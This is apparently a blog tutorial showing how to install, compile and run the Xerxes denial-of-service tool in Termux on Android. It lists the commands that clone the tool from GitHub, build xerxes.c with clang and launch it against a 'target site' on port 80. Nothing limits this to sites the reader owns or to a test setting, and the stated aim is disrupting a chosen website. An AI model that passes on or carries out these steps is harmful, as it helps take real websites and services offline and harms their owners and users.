How to install Xerxes DDOS tool for termux

Hello guy’s in this article I’m going to show you how to install xerxes ddos tool for termux Let’s start.,,

DDOS meaning?

Distributed Denial-Of-Service

What is DDOS?

A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt the normal traffic of a targeted server, service or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic.

What is XERXES?

XerXeS is an extremely efficient DoS tool, developed by the hacker The Jester to automate DoS attacks. It provides the capacity to launch multiple independent attacks against several target sites without necessarily requiring a botnet.

Requirement’s?

  • An android device with android version 5.0 and above.
  • Termux application
  • Internet

Step 1:

If you download the termux application means run the termux app First we are going to update the package list so type this blow command.

apt update

 Step 2:

Now we have clang package so type this below command to install clang.

pkg install clang

Step 3: 

After install clang package we will install git package this git package will help you to clone the package.

pkg install git

Step 4:

After installing the git package we are going to clone the Xerxes package into our directory with the help of git commaand.

git clone https://github.com/CyberXCodder/XerXes

 

Step 5: 

Now we have xerxes folder in our termux root directory now we need to open that folder following commands.

cd xerxes

Step 6: 

Now we need to execute xerxes file so run this following command.

clang xerxes.c -o xerxes

 

Step 7: 

Now you choose your target site is actually the site which you want to DOS type this following command.

./xerxes (target site) (port number)

The port number must be 80.

xerxes

DOWNLOAD XERXES

Post a Comment

Previous Post Next Post